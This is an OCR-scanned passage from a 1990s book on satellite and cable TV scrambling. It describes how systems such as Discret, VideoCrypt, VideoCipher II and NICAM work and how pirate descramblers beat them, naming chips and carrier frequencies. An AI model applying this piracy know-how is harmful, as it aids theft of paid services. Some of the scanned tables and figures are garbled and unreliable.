and some circuitry for determining the correct timing and amplification level. 
Hackers found it simpler to modify the operation of the official descrambler 
in order to make it operate in a piratical manner. Cable based systems and 
hacks are covered in greater detail in Chapter 8. 
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Analogue Video Scrambling 


Synch Manipulative Systems 


A Synch Manipulative System interferes with the synch pulses in the signal. 
The aim of such a system is to prevent the television receiver from locking 
up the picture. Most of the techniques are rather primitive when compared 
to digital video techniques but nevertheless they are effective. Perhaps 
more importantly for some applications, they are cheap. This does limit the 
use of systems based on these methods to small cable systems. 


The weakness in a synch manipulative system is that it tends to leave the 
colour burst alone. While it is true that the colour burst is often voltage 
shifted with respect to the video, the actual timing is the same. It is therefore 
possible to hack the system by locking a synch generator with the colour 
burst. Many of the old pirate decoders for the analogue satellite television 
systems used this method of locking. 


Synch suppression is a relatively old scrambling technique. It is rarely used 
on its own. The horizontal synch pulse or horizontal blanking area is pushed 
in the video region of the signal. There are two accepted formats for synch 
suppression; pulse gated and sine wave. 


Pulse Gated Synch Suppression 


A pulse gated synch suppression system requires a pulse train phased with 
the scrambled signal for descrambling. The pulse train is used to control a 
"pull down" circuit that restores the horizontal blanking intervals or synch 
pulses to the correct levels. 


The pulse train or recovery signal for the scrambled signal is generally 
transmitted on a separate subcarrier as in the FilmNet case. With the 
FilmNet Matsushita SATPAC system a composite synch signal was 
transmitted on a subcarrier at 7.56 MHz. On the cable version of the 
scrambling system, the composite synch signal is amplitude modulated 
onto the FM audio subcarrier. 


Sine Wave Synch Suppression 


Sine wave synch suppression uses a sine wave to push the synch signals 
into the active video region. The frequency of the sine wave can be close to 
line frequency or close to a multiple of line frequency as in the Sat Tel SAVE 
system. 
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Synch Removal And Replacement 
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The reason for the higher frequency being close to a multiple of the line 
frequency is that it creates a beat frequency. This beat frequency also 
interferes with the video and adds to the scrambled effect. 


The descrambling of a sine wave scrambled signal is not as straight forward 
as the pulse gated system. The sine wave may or may not be transmitted 
with the signal. On some of the cable systems, the recovery sine wave is 
transmitted in an amplitude modulated format on the FM audio subcarrier. 
This method of descrambling is not exactly feasible on satellite. The most 
common method used on satellite is regeneration. The sine wave is 
stripped from the scrambled video signal and sent to a phase locked loop. 
The PLL is generally running at a high multiple of the sine wave frequency. 
In the SAVE system, the frequency of the interfering sine wave is 
approximately six times line frequency, (93.750 KHz). The PLL in the 
descrambler runs at sixty four times the sine wave frequency, (approx. 6.0 
MHz). 


Synch Removal And Replacement 


The removal of the horizontal or vertical synchs is an effective if rather 
insecure method of scrambling a video signal. Since the television receiver 
has no synch signal it cannot lock the picture. The colour burst is generally 
used by descramblers for lockup. The timing of the colour burst is rarely 
changed. 


The replacement of the synch pulses with digital data is the commonest use 
of this scrambling facility. It is used in the OAK Orion system and the 
LuxCrypt systems. Digital data and audio blocks are used instead of the 
synch pulses. In the Orion system, a 2.5 MHz synch burst is transmitted 
prior to the data. This provides a lockup for the synch generators in the 
descramblers. The pirate descramblers used the synch burst to recreate the 
synch signals using monostables and simple PLLs. The LuxCrypt system 
uses a 5.792 MHz burst. 


Synch Inversion 


Synch inversion is a particularly nasty form of scrambling. Most of the 
polarity detection circuitry in pirate descramblers is geared towards com- 
plete line inversion. With this facility, only the blanking or synch section of 
the signal is inverted. The facility would optimally be used in a pulse gated 
system where the synch is suppressed. 


Since polarity detection circuitry detects the difference between the horizon- 
tal synch pulse and horizontal blanking, the video polarity is judged by these 
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Line Inversion 


PAL 625 





Normal Polarity Line. Synch Suppressed. 





Inverse Polarity Line. Synch Suppressed. 


Synch Only Ur Video Only Inversion 








Video Only Inversion. The suppressed synch is 
normal polarity. The video section is inverted. 








Synch Only Inversion. The suppressed synch is inverted 
and the video polarity is normal. 


Note: The terms Video Only Inversion and Synch Only Inversion 
can mean the same thing when applied to a synch suppressed 
system, On a clean synch system, Video Only Inversion is the 
only inversion type permitted. 


The actual inversion sequence can ре line based or field based. 
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levels. The FilmNet SATPAC system used this weakness in the pirate 
descramblers to their advantage. They inserted a peak voltage in the 
horizontal synch pulse so that the pirate descramblers could not interpret 
the polarity of the video. 


Video Inversion 


Video inversion is perhaps the most widely used facility. It can be applied to 
gated, sine suppressed or normal signals. It can be tricky in application as 
the level of the descrambled polarities may differ by a few millivolts. This 
means that either a key must be included in the scrambled video or a 
balance potentiometer must be included in the descrambler. 


A key takes the form of a section of the horizontal blanking level that is 
inverted with the video. In the scrambled signal, the horizontal blanking level 
will appear at approximately half video. With the video range being 
approximately 700 mV this half video point would be 350 mV. This provides 
the descrambler with a reference level on the descrambled line. The key 
can be sampled and compared with the normal polarity key. 


This method of scrambling is more common on satellite based systems. It is 
not really suitable for terrestrial or cable based systems. 


Field Inversion 


This is one of the simplest methods to implement and naturally the easiest 
to hack. One complete field of video, including field synch is inverted. The 
following field is normal polarity. Other sequences such as 1 normal and 3 
invert can be derived from some flip-flops and a bit of combinational logic. It 
can be applied to the video only or the complete field. The inversion point is 
often half way through one of the lines in the VBI as opposed to the 
beginning or end of the field synch. " 


Line Inversion 


Line based inversion comes in two basic forms; Keyed And Nokey. The 
keyed inversion contains a polarity indicator in the line blanking. This is 
commonly used in systems like Oak ORION or LuxCrypt. This is the least 
secure form. The nokey video inversion is a more secure form. There is no 
indicator as to the exact polarity of the video information. The inversion 
sequence can be sequential or pseudo random. Due to the difficulty of 
establishing the black level in descramblers, the Keyed inversion is the 
commonest. 
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Note: In a Fixed Video Delay system, the video always remains in 
the confines of the video region. The positions of the synchs 
are unchanged. In a Variable Video Delay system, the video 

does not have to remain in the confines of the video region. It 
can enter the area that would be occupied by the synch of the 
next line. This makes it usable with MAC systems rather than PAL 
or SECAM. 
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Average Peak Level Inversion 


Average Peak Level inversion, pronounced ‘apple’, is a more secure 
method of effecting video inversion. The polarity of the video is decided by 
the amount of black or white in a scene. Each frame is sampled and when 
the cumulative value of the samples exceeds a preset threshold the video is 
inverted. It does not change polarity again until the threshold is exceeded. 


Video Delay 


The video delay form of scrambling is used in a number of scrambling 
systems. The old Discret system as used by Canal Plus is based on this 
form of scrambling. The B-MAC system by Scientific Atlanta also uses this 
scrambling method though the delay increments are smaller. 


Fixed Delay 


The fixed delay facility delays the video on each line by one of a number of 
fixed delays. In the Discret system, the delays are 0, 902 nS and 1804 nS. 
The delay can be implemented by CCDs, glass delay lines or gyrator delay 
lines. Once the length of the delay lines are known, the system is easily 
hacked. 


The term Fixed Delay is applied here as there are only three delay states. 
The main flaw in the Discret design is that the delay units are readily 
emulated by existing electronic components. 


Variable Delay 


The variable delay is a lot harder to hack. In the B-MAC system the video 
sections of the line are delayed by varying the length of the data block. 
Again it is a question of ascertaining the minimal delay length and the 
maximum number of delay units. 


This type of scrambling is harder to hack in a reliable manner as there is a 
greater variance of delay length. Off the shelf solutions can be more difficult 
to find in this type of scrambling system as the video has to be expanded 
digitally. 


Given the advances in video electronics, the security of variable delay video 
scrambling is not as good as it was in the eighties when B-MAC was 
developed. 
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Video Position Modulation 


This is the Macrovision PhaseKrypt system. It is one of the hardest systems 
to hack. It is a very secure method of video scrambling. The position of the 
video in the line is modulated. The video information itself is slightly 
shortened to accommodate this. The delay section at the end and beginning 
of each video area are filled with electronically stretched video. The delay is 
too slight to be properly detected and as a result it is extremely difficult to 
hack using a video only approach. 


This is actually an ideal system for small scale deployment such as on 
cablenets. However on satellite borne transmissions carrying high premium 
programming, things change. The system relies on the access control 
circuitry remaining unhacked. With a large scale satellite borne system, 
hacking the access control circuitry, even if it is ASIC based is a very real 
possibility as FilmNet found to their cost. 


Digital Video Techniques 


The following techniques are generally applied to digitised video signals. 
Systems employing these facilities are generally harder to hack and in most 
cases the scrambling process is not actually hacked. The weak point is 
almost invariably the control circuitry. Of course with the advances in video 
electronics and the falling price of processing power, hacks on the video 
aspect of digital systems are now more likely. 


The majority of new systems hitting the market use one or more of the 
digital video techniques outlined below. The most favoured type of 
scrambling is the line shuffle. While the cheaper option is to use a sliding 
bar shuffle, there are other more secure versions that rely on full field 
shuffle. The full field shuffle is a memory intensive option and the price per 
decoder reflects this. As a result of the high price of decoder, it is aimed 
more at services carrying extremely high value programming rather than at 
the ordinary premium programming channel. 


The one factor that will decide whether a digital video based system is 
hacked via the video is the cost of reverse-engineering the smart card as 
opposed to creating a pirate digital video decoder. As the price of Digital 
Signal Processor chips falls, the scrambling systems relying on digital 
techniques will become increasingly unsafe. Already there has been a 
hardware based hack on the Nagra system (SECAM version). This system 
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has been in operation for some six years and has lasted that time without a 
serious hack. 


In terms of security against a hardware hack, line cut and rotate fares better 
than line shuffle. With experiments with a hardware based hack on line cut 
and rotate, the pirate decoder has to be reset every few minutes as scenes 
with a high content of one particular colour tend to cause problems for the 
processing circuitry. In general these systems are complex. Chapter 7 deals 
in detail with digital video systems. 


Cut And Invert 


The digitised line is cut at a particular point and all data following that point 
is inverted. This can be achieved in analogue technology but there tends to 
be residual problems such as tilt. 


Cut And Rotate 


The digitised line is cut at a particular point and the two sections are rotated 
so that the last section becomes the first and vice versa. It is a rather secure 
method but the cut points have to be masked to prevent weakness and 
noise. The VideoCrypt system uses this form of scrambling as does 
Cryptovision. 


The cut sequence is generated by a Pseudo Random Number Generator 
that is seeded by a seed transmitted in encrypted format over the air. There 
have been some experiments to establish the parameters of the PRNG in 
the VideoCrypt decoder. Of course the problem here is that the establishing 
the cut points in the scrambled video is generally too difficult. This means 
that a hardware hack based on detecting the cut points and resynchronising 
the sequence to the PRNG sequence is not viable as long as the smart card 
is effectively compromised. 


Line Shuffle 


This system is purely a digital one. The actual field position of each line is 
changed. For example, line 26 might become line 38. The system can be 
applied on a field or frame basis. 


However applying this type of scrambling on a field or frame basis is 
memory intensive. As a result, a decoder for such a system would be 
expensive. The alternative is to use a smaller block of lines in each field and 
for added security slide the block in each field so that a different block of 
lines is selected each in field. This is a more economical option that 
produces almost as much security as the full field shuffle. 
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Line Shuffle 


Original 





Scrambled 





The order of the lines is changed though the video 
Information remains the same. 


Line Cut And Rotate 





The video is cut at one of 256 points and the 
segments are rotated about that point There is 
an etement of cloaking on the cuspoint. Descram- 
bling involves delaying the /СО/ segment and 
clocking the /ab/ section out first. 
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Hard Encryption 


This digital video technique is the most secure. The digital data of the 
samples is encrypted using an algorithm such as the DES or RSA. A 
number of services using purely digital video with hard encryption are in 
operatio. The DirecTv system in the USA is a good example of this type of 
system though the smart card aspect on this system is totally compromised. 


The systems using hard encryption generally use a standard digital video 
protocol such as MPEG 2 and overlay it with encryption. This saves 
development time and means that the main demodulation circuitry can be 
bought off the shelf. The only custom aspect of the decoder is the security 
electronics. 


A number of services will commence operation in Europe in the next year or 
so. These will be based on the Digital Video Broadcasting specifications. 
Apparently they will all use a common scrambling algorithm for the video 
which will be kept top secret. The Conditional Access manufacturers will 
then provide their own security overlay. 


Audio Scrambling Techniques 


Scrambling the audio can in itself be an effective measure for low pay 
services. It tends to destroy the entertainment value of the video unless the 
video doesn’t require any audio track. Another more recent threat to the 
facility of audio scrambling is multilingual teletext subtitling. 


The use of audio scrambling has not been that apparent in Europe. While it 
is used on cable based systems, satellite based systems tend to opt for 
hard video scrambling techniques. Where audio scrambling is used on 
satellite, it is often just a token form of scrambling. One reason for this is 
that in the absence of a synch signal, most European televisions will 
automatically blank the sound. Therefore adding audio scrambling to a 
system that suppresses or manipulates the synch pulses seems like 
overkill. 


On satellite, some of the services using hard video scrambling also include 
a token audio scrambling facility. The commonest is spectrum inversion. 
This is due more to its ease of implementation than anything else. 


The only situation where hard encrypted audio was used as an add-on to 
scrambled video in Europe was on the short lived FilmNet digital audio 
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system. This was an add-on for the totally compromised analogue video 
scrambling system that was in use at the time. 


In the USA, the VideoCipher ІІ system took the opposite route to the 
European systems and used DES based encryption on digital audio while 
protecting the video with a simple synch replacement scramble. 


The general trend has been moving away from analogue audio scrambling 
methods towards more secure digital audio. The D2-MAC EuroCrypt 
system is a classic example of this trend. The video in this system is hard 
encrypted with double cut and rotate and the audio too has the facility for 
hard encryption. Many of the channels using D2-MAC EuroCrypt leave the 
audio in the clear as a barker channel. 


On the surface, digital audio appears to be a good choice for security. The 
actual digital audio datastream or signal is secure when being transmitted 
and often the manufacturers will claim that the system uses DES or RSA or 
some other secure algorithm to encrypt the over the air datastream. This of 
course is a false security. 


The point at which a digital audio scrambling system gets hacked is in the 
authorisation and access control section. A hacker will attack the official 
decoder and try to make it operate as a pirate decoder. Most of the time, 
this type of hack will succeed. A classic case of this premise breaking down 
was the FilmNet system. In the FilmNet system, a complete reverse- 
engineering of the hardware and authorisation section was necessary. The 
final hacker product was better in quality than the official FilmNet decoder. 


The VideoCipher ІІ system followed the pattern. It was hacked because it 
was possible to hack the authorisation data. The FilmNet digital audio 
system was hacked because a complete reverse engineering of the 
decoder was possible. 


Тһе VideoCipher ІІ system was a good illustration of the damage that a 
single system environment can do to the satellite television business. 
VideoCipher II had a virtual strangle hold on the US satellite television 
industry with most satellite based channels resorting to it. Of course when it 
was hacked, the hack affected all channels. Because of the blanket 
deployement of the system, the hack became a self perpetuating disaster. It 
is safe to say that VideoCipher ІІ would not have stood a snowball’s chance 
in Hell in Europe. This is perhaps the prime reason that no European 
channel used VideoCipher II. 


Any digital audio system that uses a fixed algorithm and a changeable key 
set is a disaster waiting to happen. This kind of system can no longer be 
considered secure. It is a frozen architecture therefore it can be reverse 
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engineered. Then it can be duplicated. Then it is up to the scrambling 
system owner to find the identity of the decoders being used to obtain the 
keys and turn them off. 


Analogue Audio Scrambling Techniques 


FM'd Audio 


The audio signal is frequency modulated on to a carrier frequency in the 
range 30 KHz to 100 KHz. The commonest in the US systems are 62.5 
KHz, 31.5 KHz, 40 KHz and 63 KHz. While this form of audio scrambling 
was used in the USA, it has not been used on any satellite systems in 
Europe. 


Descrambling this type of scrambled audio requires a PLL type circuit. 
There are a number of other types of demodulators but the PLL is the 
easiest to adapt to this low frequency. The two commonest PLL ICs used 
for this application are the NE565 and the 4046. The circuit diagram for the 
NE565 operating at 62.5 KHz is given. The PLL demodulator will need to be 
preceded by an amplifier as the response of the audio demodulators in most 
receivers will not be sufficient. Ideally a separate demodulator should be 
used for the descrambler. 


In many respects this is an antique. It does not offer any decent security. 
Where it was used, the video was also scrambled, often with a reasonably 
secure scrambling system. 


Spectrum Inversion 


Spectrum inversion is presently being used by the Discret scrambling 
system. The audio on the Nagra Syster is also scrambled using this 
technique. 


This is essentially a single sideband technique applied to audio and was 
also used for some simple telephone scrambling systems of the late 
seventies. The descrambling of this system is slightly more complicated 
than the previous one. The centre frequency, (the frequency around which 
the spectrum is rotated), has to be recreated. 


In the RITC Discret 1 official descrambler, this frequency, (12.8 KHz), is 
obtained by dividing down the output of an 8.0 MHz crystal oscillator by 625. 
In the pirate Radio Plans design, the output of a crystal oscillator running at 
3.2768 MHz was divided by 512 to produce the carrier. A more elegant 
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Analogue Audio Scrambling Techniques 


Carrier Frequency 


Voltage 





К Frequency 
Spectrum Inversion 


Voltage 


With Spectrun Shift the audio spectrum 
is shifted upwards in frequeny. It is more 
complex than inversion and is not 
frequently used due to the cost. 
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Voltage With FMed audio, the audio is FMed on to a frequency, typically three 
or four times line frequency. 
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FM'ed Audio 


2-28 


2: The Principles Of Security 


method would be phase locking a PLL to the vertical synch. By using a 
divider of 256 in the VCO - Phase Detector path, the voltage controlled 
oscillator output would be 12.8 KHz. 


The core of the hacker audio descrambler for spectrum inversion is the 
balanced demodulator. The commonest IC used for this application is the 
MC1496. The only variations between hacker decoder designs for this type 
of audio scrambling lies in the carrier generation. 


Some designs use the 4060 as the oscillator and divider on a single chip. 
Others use a separate chip for the oscillator, typically a 4069, and a 
separate divider. Of the two the 4060 is the more elegant solution. 


Spread Spectrum Inversion 


This form of audio scrambling is based on the spectrum inversion process. 
It uses a number of carrier frequencies and as such it can be difficult to 
hack if all the frequencies are unknown. 


Most of the scrambling systems using this type of audio scrambling use one 
or more crystals to derive the carrier frequency. The descrambler itself 
derives the video interference carrier from one of the crystal frequencies. 
The audio inversion frequency is linked to the particular carrier frequency in 
use at the time. In the SAVE system, the carrier frequency is generally one 
sixth that of the video interference carrier. 


Band Inversion And Rotation 


Band spectrum inversion is where the audio spectrum is filtered into 
different bands and these bands are then inverted or rotated. This is a more 
secure method than any of the previous ones. It is also more complex and 
requires a more complex descrambler. 


Ideally the audio in each band would be compressed before processing. 
This system is used in some audio scramblers for use on telephone 
systems. It is more difficult to hack. The main disadvantage is that the 
scrambled audio is still discernible in some band rotation combinations. 


Spectrum Shift Scrambling 


With Spectrum Shift, the audio spectrum is shifted upwards in frequency. 
On paper it looks simple. In practical terms it is more complex than 
Spectrum Inversion. 
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Single Frequency Shift 


This is the type of audio scrambling system that was used on the now 
defunct BBC version of SAVE. To scramble the audio, the complete 
spectrum is shifted up in frequency by about 1 KHz. To descramble the 
signal, the scrambled spectrum is shifted back down by 1 KHz. This is 
generally achieved by Sideband modulation techniques. 


The subject is dealt with in detail in the October 1991 issue of Elektor 
Electronics. A full circuit diagram and PCB layout are given in the article. 


Strangely when the article was published, very few people recognised it for 
what it was. Considering the BBC’s legalistic antics when Elektor published 
the SAVE circuit, this may have been a good thing. Of course it does go 
some way towards the stereotype of the technologically clueless lawyer. 


Multiple Frequency Shift 


The use of a single shift is not a very secure option. As a result this form of 
scrambling is more commonly used with a cycling shift. The shift frequency 
can be derived from a number of crystals or a synthesizer. 


Digital Audio 


It is rare for a Digital Audio system to be hacked from a harware point of 
view. The only case of this happening was FilmNet's ill-fated digital audio 
System. It is commonplace for the access control element of a digital audio 
system to be hacked. 


The architecture of most digital audio systems is simple. Of course the 
simplicity of architecture belies its security. The audio signal is digitised and 
then it is EXORed with the output of a Pseudo Random Binary Sequence 
Generator. This PRBSG is reseeded every few seconds with a new starting 
point. In this manner the output of the PRBSG seems to be random. The 
reseeding data is the key and this is normally the thing that is heavily 
protected with the cryptographical algorithms. 


This is of course a very simplifed model but it is also the easiest to 
implement in terms of hardware. The PRBSG can be constructed as part of 
an ASIC and the digital audio decoder circuitry can be constructed from off 
the shelf components. 


More commonly, the structure that the FilmNet system used is employed. 
Conventional circuitry is used to demodulate the data into a serial 
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datastream. This datastream is then fed to a custom ASIC which processes 
it and then decrypts it. The decrypted data is then fed to a digital to 
analogue converter. The use of an ASIC allows the designers more leeway 
in the choices of crypto systems. While the EXORed PRSG is one of the 
simplest methods, other more complex algorithms can be incorporated into 
the design. 


Perhaps the more complex solution of using a complete crypto system such 
as DES to process blocks of digtised audio is not a good one. The 
decryption process would have to be fast enough not to affect the 
synchronisation of the soundtrack and video. Of course it would be possible 
to adjust the audio so that it is slightly ahead of the video. The inherent 
delays in encryption and decryption processes would bring the soundtrack 
and the video back into synch. 


There is one system using the DES to encrypt their digitised audio; 
Videocipher ІІ. This system was hacked due to a flaw in the hardware 
implementation. The audio crypto system was not hacked. Though it is safe 
to say that VideoCipher would not have survived in Europe. It is simply too 
old in terms of technology to be a viable system for the nineties. 


Both Orion and Videocipher use pulse coded modulation, (PCM), to digitise 
their audio. One technique is the reverse transmission of digitised blocks of 
audio information. This type of transmission is secure enough to defeat the 
casual hacker but will soon fall victim to the dedicated hacker. The key to 
the descrambling lies in identifying the beginning and end of each block. 


The digital audio will be encoded according to a recognised data standard. 
Developing and testing a new data transmission standard for the sake of 
one scrambling system is rarely economical unless the design team has an 
extremely large budget. 


The commonest combination in digital audio scrambling is a well estab- 
lished data transmission format such as Phase Shift Keying, (PSK), and a 
customised crypto system. In this respect the first stage of the hack would 
be the easiest. The encrypted data would have to be extracted from the 
signal. The second step would be the hacking of the crypto system. 


It is common practice to test the digital audio transmission format with clear 
data. This sometimes causes JAFAs to believe that they have hacked the 
system while in reality, the system has not been implemented. 


There are many types of digital audio format. In this section we shall only 
deal with two; Adaptive Delta Modulation and NICAM. These systems are 
currently in use in Europe. Adaptive Delta Modulation is used on the 
Scientific Atlanta B-MAC system and NICAM is used terrestrially. Though 
as yet NICAM has not been used as a form of scrambling. 
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NICAM 728 


NICAM stands for Near Instantaneously Companded Audio Multiplex. The 
analogue audio signal is digitised and is compressed when in digital format. 
The digital information can then be transmitted in a multiplex format so that 
mono channels or a stereo channel can be transmitted in the one frame. At 
the receiving end, the signal is then digitally expanded and converted back 
to analogue. There are two basic reasons for companding the audio. The 
first is the reduction of bits required, the second reason is the improved 
signal to noise ratio in the received audio. 


The analogue audio is sampled at a rate of 32 KHz. This is just over twice 
the maximum audio frequency of 15 KHz. There are 14 bits in the initial 
audio sample. This 14 bit binary word is digitally compressed to 10 bits. 


The NICAM system was developed by the BBC in the seventies. The UK 
version is often referred to as NICAM 728. The number 728 refers to the 
transmitted bit rate of 728 Kilobits per second. One 728 bit frame is 
transmitted every millisecond. The breakdown of the bit rate is shown 
below. 


8 bits Frame Alignment Word 8 Kbit/s 

5 bits Control Information 5 Kbit/s 

11 bits Additional Data 11Kbit/s 

704 bits Sound, Parity or Data 704 Kbit/s 
Total: 728 Kbit/s 


The first step in the compression procedure is to separate the digital 
samples into blocks of thirty two samples each. 


The second step is to code the 14 bit binary samples using a 10 bit 2s 
Complement code to an accuracy defined by the magnitude of the largest 
sample word in the block. 


The 2s Complement code is an alternative way of representing a number 
using ones and zeroes. One bit in the number represents the whether the 
number is positive or negative. This is its sign. The rest of the bits represent 
the magnitude of the number. This type of representation is called `° Signed 
Number Representation". In this system, positive numbers are represented 
as simple unsigned binary. There is no change. For a negative number, the 
situation is different. The binary number to be converted is inverted on a bit 
by bit basis. A 1 will become a 0 and vice versa. Then 1 is added to it. The 
most significant bit, MSB, of a negative 2s complement number will be 1. 
The following example will make it clearer. 
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The 14 bit sample is converted to 2s Complement format and 


then is processed according to the chart shown above. Four bits 
The actual format of a Mono NICAM Frame can be seen in 


the diagram on page 4-9. 


The NICAM Compression Chart: 
out of each of the 14 bit wide 2s Complement word are omitted 


from the final 10 bit word. 
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Example: 


To express -7 in 2s Complement, invert 0111,(+7 = 0111). This gives 1000. 
Add 1, this gives the final value of 1001. Therefore in 2s Complement code 
-7=1001. 


In the third step a Scale Factor is then generated. The Scale Factor tells the 
receiver which degree of compression is used. The scale factor word is 
three bits wide. 


The Coding Range is defined by the Scale Factor. There are five coding 
ranges. These are relative to a maximum amplitude of 1. 


Range 1: 1%00.5 

Range 2: 0.5to 0.25 
Range 3: 0.25 to 0.125 
Range 4: 0.125 to 0.0625 
Range 5: 0.0625 to 0 


As can be seen from the diagram, if the block of samples are in coding 
range 1, the four least significant bits are discarded. For range 2, the three 
least significant bits are discarded as is the second most significant bit. In 
each case, the number of bits in the sample is always 10. In this way, the 14 
bit samples are first coded into 25 Complement and then into a 10 bit 
compressed sample. 


A further level of information is provided for the receiver by the protection 
range. This is also related to the Scale Factor. The relationship is shown in 
the table below. 


Coding Ranges Protection Ranges Scale Factor 


r1r2 гЗ 
1 1 1.2.1. 
2 2 110 
3 3 1 0-1 
4 4 011 
5 5 100 
5 6 010 
5 di 001 
5 7 000 


A parity bit is added to each sample. This is produced by checking the six 
most significant bits. 
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The sound and parity bits in the NICAM frame only comprise 704 bits of the 
728. The other bits are taken up by the Frame Alignment Word, 8 bits; the 
Control Information, 5 bits; Additional Data, 11 bits. 


The Frame Alignment word is an eight bit word, 01001110, that is 
transmitted at the start of every frame. Its function is to synchronise the 
receiver with the datastream. 


The control information is transmitted as a five bit block. The first bit, с0 is 
the frame flag bit. It is high for the first eight frames and low for the next 
eight. The next three bits, c1, c2, c3 identify the application of the contents 
of the sound block. The correct term for them is the application control bits. 
Bit c3 is used to indicate the need for further processing by the receiver. It is 
this bit that would be used to switch in the decryption circuitry in the 
receiver. If the bit is high and the receiver does not have the necessary 
decryption circuitry, then the audio output will be switched off. The fifth bit c4 
is the reserve audio switching flag. This bit is high when the FM subcarrier is 
carrying the same channel as the NICAM. 


Application Control Bits Table 
Data Contents Of Sound Blocks 
c1 c2 c3 
000 Stereo signal. Alternate samples. 
010 Two Mono channels, M1 and M2, alternate frames. 
100 One Mono audio, one data channel, alternate frames. 
110 One 704 bit data channel. 
There are eleven additional data bits. The function of these bits has not 


been defined. It would be easy to use them as a service identifier or for 
transmitting other data. 


The modulation format used to transmit NICAM, terrestrially, is Differentially 
Encoded Quadrature Phase Shift Keying or DQPSK for short. This is a 
rather elegant modulation system in that it reduces the bandwidth required 
to transmit the data. Each phase change represents a bit pair or two bits of 
data. The following diagram shows the rest state of the carrier phase. The 
rest states are ninety degrees apart. The carrier phase remains in one of 
the rest states until a bit pair causes it to change phase by the 
predetermined amount. The phase change caused by each bit pair is shown 
in the table. 
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Carrier Rest States Bit Pair - Phase Change Table 


1 Bit Pair Phase Change 
AB Phase Change In Degrees 
0 0 0 
0 1 -90 
10 -270 
тей -180 


With the carrier іп rest state 1, a bit pair of 10 will cause a phase change of 
-270 Degrees. This would put the carrier phase in rest state 4. Applying a 
further bit pair of 11, would cause a phase shift by -180 Degrees to rest 
state 2. Applying a further bit pair of 01 would cause a phase shift of -90 
Degrees to rest state 3. Strangely, the negative shift is clockwise. 


The modulation format is clear and unambiguous. A bit pair can always be 
recovered by comparing the present phase of the carrier with the immedi- 
ately previous phase. 


Before the 728 bit frame is converted to bit pairs, the datastream is 
scrambled for spectrum shaping purposes. This is carried out to ensure that 
the data looks like noise and so causes minimum interference to the video 
or other audio carriers. A pseudo random sequence generator is EXORed 
with the data stream. The PRSG is a nine stage type. The initialisation word 
is 111111111. The Frame Alignment Word is not scrambled. The first bit 
that is scrambled is the bit immediately after the Frame Alignment Word and 
the last bit that is scrambled is the bit immediately before the FAW. The 
descrambling of the frame must be carried out at the receiver before the 
multiplex is split up. 


Since the information is in digital format, it is easy to encrypt. The simplest 
method is to encrypt the Frame Alignment Word, FAW. This would ensure 
that a NICAM descrambler that didn't have a valid FAW couldn't lock up the 
frame. The NICAM digital signal is EXORed with a PRSG bitstream for 
noise reduction purposes. This PRSG has a fixed seed. If a variable seed is 
used, a simple though efficient encryption system could be effected. The 
keys for the encryption system could be held in the descramblers or 
transmitted in the unassigned bits in the NICAM signal. 


The NICAM format could easily be adapted to a satellite television 
application. The first and most obvious modification to the standard is the 
carrier frequency. The carrier frequency for NICAM 728 as used in the UK is 
6.552 MHz. This frequency is obtained by multiplying the transmitted bit rate 
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of 728 Kilobits per second by 9. By multiplying the bit rate by 10, a carrier 
frequency of 7.28 MHz would be obtained. The bandwidth of the NICAM 
carrier on the UK terrestrial system is 700 KHz. The beauty of this 
modification is that only necessary modifications to a normal NICAM 
demodulator are the carrier crystal frequency and the input bandpass filter. 


Adaptive Delta Modulation 


The Adaptive Delta Modulation format was developed by the Dolby 
Laboratories. It is used on the Scientific Atlantic B-MAC system. This 
system is currently employed on the AFRTS and the SIS Racing channel. 


Delta is used in mathematics to indicate change. In a delta modulation 
system, the delta refers to the direction of the change. The delta would be 
positive or negative. There is a disadvantage associated with ordinary delta 
modulation systems. When the amplitude of the audio signal changes by an 
amount greater than the quantizing step size, (the minimum voltage change 
required to effect a one bit change in the digital output of the analogue to 
digital converter), an overload occurs. Adaptive delta modulation overcomes 
this problem by using a variable step size and a variable pre-emphasis. 


At the encoder, the audio input is continually monitored so that the best step 
size and pre-emphasis can be selected. The adaptive delta modulation 
produces a bitstream of between 200 and 300 Kbit/s. The step size and 
pre-emphasis data are transmitted at a lower bit rate. This makes the 
design of a decoder simpler. 


The slower bit rates of the step size and pre-emphasis data allows them to 
be filtered out with simple low pass filters. As can be seen in the simplified 
adaptive delta modulation decoder, the decoding process is straightforward. 
The digital audio data is fed into a flip flop. This flip flop is clocked by the 
audio clock. The output of the flip flop is either 1 or 0. The output is fed to a 
multiplier. The multiplier is an analogue circuit that is used to form the 
product of two voltages. The multiplication factor is set by the step size data. 
The output of the multiplier is fed to a leaky integrator. The output of the 
multiplier is essentially a set of discrete voltage points. The leaky integrator 
joins these points to give a smoother signal. The output of the leaky 
integrator is then fed to the variable de-emphasis circuit. The resultant audio 
is then amplified and fed to the modulator or audio output. 


An adaptive delta modulation decoder is available in chip format as the 
NE5240. This is a stereo decoder and is used in the B-MAC descramblers 
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manufactured by Scientific Atlanta. In these descramblers the digital audio 
must first be decrypted before being converted form adaptive delta 
modulation format. The encryption system used in the B-MAC system is a 
variant of the Data Encryption Standard. It is also more secure than the 
DES. Nobody has commercially hacked the audio on this system. Instead 
they hacked the access control software. 


Duobinary Encoding 


The Duobinary encoding system is a relatively simple method of encoding 
data. It allows for the even simpler design of the decoder. It is used in the 
D-MAC and D2-MAC systems. It is a baseband system that conveys data 
by the level of a three level waveform. This analogue-like appearance 
means that it can be frequency modulated for satellite television transmis- 
sion along with the reset of the MAC signal. The disadvantage of the 
C-MAC system was that it required the video section of the line to be 
frequency modulated and the data section to be 2-4 PSK modulated. This 
meant that two demodulators were required and the encoding circuitry was 
over-complicated. 


In this section we are concerned with digital audio. D-MAC and D2-MAC are 
covered in detail in Chapter 7. In D-MAC there are 209 data bits in each 
line's sound and data packet. In D2-MAC there are 105 bits in each line's 
packet. 


A duobinary encoder can best be considered in three stages. The overall 
process is a combination of digital and audio techniques. 


The first step is to pre-code the bitstream. The bitstream is inverted. Each 
bit in the bitstream is then EXORed with the bit immediately previous. The 
new bitstream is then fed to a level shifter. This produces a +1 and -1 
bitstream. 


The second stage is part of the encoder is the encoding section. The 
pre-coded bitstream is subjected to a one bit delay and added to itself 
linearly. The resultant signal is amplitude limited so that it cannot exceed the 
maximum video level. 


The third stage is the low pass filtering. This is essential if the bitstream is 
not to produce harmonics. The other reason for the low pass filtering is to 
reduce the bandwidth required for the D2-MAC sound and data packet to 
approximately 5.026 MHz. In the D-MAC system, the filter limits the D-MAC 
sound and data packet's bandwidth to approximately 10.5 MHz. 
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The top waveform, А, is the actual duobinary encoded 
signal. It Is a tristate signal. The levels used are 0 Volts, 
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The comparators in the diagram below slice the duobinary 
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The levels of the duobinary encoded signal аге +0V4, OV and -0V4. Logic 1 
